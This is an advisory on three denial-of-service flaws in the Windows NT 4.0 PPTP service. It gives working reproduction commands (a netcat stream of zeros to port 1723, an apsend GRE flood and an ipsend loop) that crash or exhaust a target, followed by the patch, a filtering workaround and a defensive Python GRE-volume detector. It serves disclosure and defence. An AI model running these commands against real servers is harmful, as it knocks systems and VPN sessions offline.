COMMAND
PPTP
SYSTEMS AFFECTED
Windows NT 4.0 servers running PPTP
PROBLEM
Kirk Corey found the following. The PPTP service in Windows NT 4.0
has a flaw in a part of the code that handles a particular type
of data packet, which results in a leak of kernel memory. If a
sufficient number of packets containing a specific malformation
were received by an affected server, kernel memory would
eventually become exhausted. The likely outcome would be that the
server would either hang or fail altogether. In either case, the
machine would need to be rebooted to restore normal operation, and
any PPTP sessions underway at the time would be lost. It would
not be necessary for the attacker to establish a valid PPTP
session in order to exploit the vulnerability.
Mitigating Factors:
- The vulnerability does not threaten the security of data within
PPTP sessions -- it is strictly a denial of service
vulnerability.
- Only Windows NT 4.0 machines running the PPTP service are at
risk. The service does not run by default.
- The Windows 2000 PPTP service is not affected by the
vulnerability.
The bulletin/FAQ only lists NT Server versions as vulnerable. In
fact, NT Workstation is also vulnerable if PPTP is configured in
server mode (i.e., configured to accept an incoming PPTP
connection). If your NT Workstation is configured in this way,
it may need to be patched.
Also, the FAQ states that several hundred packets are not enough
to exploit the vulnerability. Actually, the patch fixes two
vulnerabilities in the NT PPTP component, one of which requires
on the order of 400,000 packets to exploit, and the other only
about 10-50.
PPTP (Point-to-Point Tunneling Protocol) is a networking
technology that is used to create VPNs. The protocol uses TCP
(port 1723) and GRE to perform its work. PPTP is specified in
RFC 2637 (see http://www.ietf.org/rfc/rfc2637.txt).
This advisory presents three separate vulnerabilities. All three
vulnerabilities affect Windows NT 4.0 Workstation and Server
computers configured to accept incoming PPTP connections. The
first vulnerability involves malformed TCP packets; this
vulnerability only affects certain hardware, and only affects
systems pre-SP6. The second and third vulnerabilities involve
malformed GRE packets; these affect computers with any Service
Pack.
Steps to reproduce (exploits) - tools needed:
- Unix box (e.g., Linux, *BSD)
- netcat ( http://www.l0pht.com/~weld/netcat/ or http://www.securityfocus.com/tools/137 )
- apsend ( http://www.elxsi.de/ or http://www.securityfocus.com/tools/976 )
- ipsend ( http://coombs.anu.edu.au/%7Eavalon/ or http://www.securityfocus.com/tools/129 )
Vulnerability 1: TCP Port 1723
===============================
This vulnerability only applies to machines prior to SP6. Not all
machines are affected; it appears there may be some BIOS or other
issue at work here. To reproduce, enter the following on the Unix
box:
nc <ip address> 1723 < /dev/zero
If vulnerable, the target host will blue screen in a few seconds
with an error such as:
STOP 0x0A (0x0, 0x2, 0x0, 0x0)
IRQL_NOT_LESS_OR_EQUAL
Again, this vulnerability is machine-dependent; a list of tested
hardware and results can be found in the online version of this
advisory at
http://www.dsi-inc.net/dsi/pptp_security_report.shtml
Vulnerability 2: GRE
=====================
This vulnerability applies to all service packs. To reproduce, on
the target machine, open task manager and select the performance
tab. Also, open a DOS window (Start: Run: cmd). On the Unix box:
apsend -d <ip address> --protocol 47 -m 0 -q
On the target host, you will see the numbers for kernel memory
slowly rise in task manager. Eventually, these numbers will stop
increasing; at this point, CPU may hit 100% for some period of
time. Now try issuing a command such as DIR at the command
prompt; you'll see a message indicating the OS isn't able to
complete the command. Also, you may find the following in your
System event log:
Event ID: 2000 "The server's call to a system service failed unexpectedly."
and/or
Event ID: 2019 "The server was unable to allocate from the system nonpaged pool because the pool was empty."
Eventually, the target host may reboot/blue screen, or it may
simply remain in an unusable state. As noted by Microsoft in
their description of the issue, a large number of packets is
required. For a server with 64 MB RAM installed, something on the
order of 350,000 to 400,000 packets is needed. Note that the
effect is cumulative; e.g., an attacker could send 200,000 packets
at 10 A.M. and 200,000 at 2 P.M.
Vulnerability 3: GRE
=====================
This vulnerability also applies to all service packs. To
reproduce, on the Unix box:
#!/bin/csh
foo:
ipsend -i <interface> -P gre <ip address> > /dev/null
goto foo
The target host will blue screen quickly. Approximately 50
packets are required.
SOLUTION
A patch is available to fix this vulnerability. Please read the
Security Bulletin:
http://www.microsoft.com/technet/security/bulletin/ms01-009.asp
for information on obtaining this patch. No versions of Windows
2000 are believed vulnerable.
As a workaround, it is possible to filter GRE by source address
at your perimeter. However, since GRE is a connectionless
protocol, source address spoofing is trivial. Thus, if an
attacker can guess what source addresses are allowed, filtering
may not be effective.
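Added example (not from the advisory or from Microsoft): a defender-side check in Python that tracks cumulative GRE (IP protocol 47) volume per PPTP server, keyed on destination because the workaround above notes that source addresses are trivially spoofed, and that picks the two System event IDs from Vulnerability 2 out of an exported log. The flow records, event text and alert threshold are constructed from the figures given in this advisory.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
# Constructed perimeter flow records (not from the advisory), one per batch:
# "timestamp src dst ip_protocol packet_count". Two 200,000-packet bursts
# four hours apart mirror the cumulative case the advisory describes.
FLOW_LOG = """\
2001-02-13T10:00:00 203.0.113.7 192.0.2.10 47 200000
2001-02-13T10:05:00 198.51.100.4 192.0.2.10 1723 12
2001-02-13T14:00:00 203.0.113.7 192.0.2.10 47 200000
2001-02-13T14:10:00 203.0.113.9 192.0.2.11 47 50
"""

# Volume at which the advisory saw kernel memory exhausted on a 64 MB
# server; used here as the alert threshold for cumulative GRE traffic.
GRE_EXHAUSTION_THRESHOLD = 350_000
WINDOW = timedelta(hours=24)

def gre_totals(log_text, window=WINDOW):
    """Cumulative GRE (IP protocol 47) packets per destination PPTP server,
    counting records within `window` of the newest one for that host. Keyed
    on destination only: GRE sources are trivially spoofed (see workaround)."""
    seen = defaultdict(list)
    for line in log_text.splitlines():
        ts, _src, dst, proto, count = line.split()
        if proto == "47":
            seen[dst].append((datetime.fromisoformat(ts), int(count)))
    totals = {}
    for dst, records in seen.items():
        newest = max(t for t, _ in records)
        totals[dst] = sum(c for t, c in records if newest - t <= window)
    return totals

def gre_alerts(log_text, threshold=GRE_EXHAUSTION_THRESHOLD):
    """Destinations whose cumulative GRE volume has reached the threshold."""
    return sorted(d for d, n in gre_totals(log_text).items() if n >= threshold)

# Constructed System event log export; 2000 and 2019 are the IDs the
# advisory associates with nonpaged pool exhaustion on the PPTP server.
SAMPLE_EVENTS = """\
Event ID: 6005 "The Event log service was started."
Event ID: 2000 "The server's call to a system service failed unexpectedly."
Event ID: 2019 "The server was unable to allocate from the system nonpaged pool because the pool was empty."
"""
POOL_EVENT_IDS = {"2000", "2019"}
EVENT_RE = re.compile(r"Event ID:\s*(\d+)")
def pool_exhaustion_events(event_text):
    """Event IDs from the export that indicate pool exhaustion, in order."""
    return [m.group(1) for m in EVENT_RE.finditer(event_text) if m.group(1) in POOL_EVENT_IDS]
```

Because the effect is cumulative and survives only a reboot, the window should be at least as long as the server's expected uptime between restarts, not a few minutes.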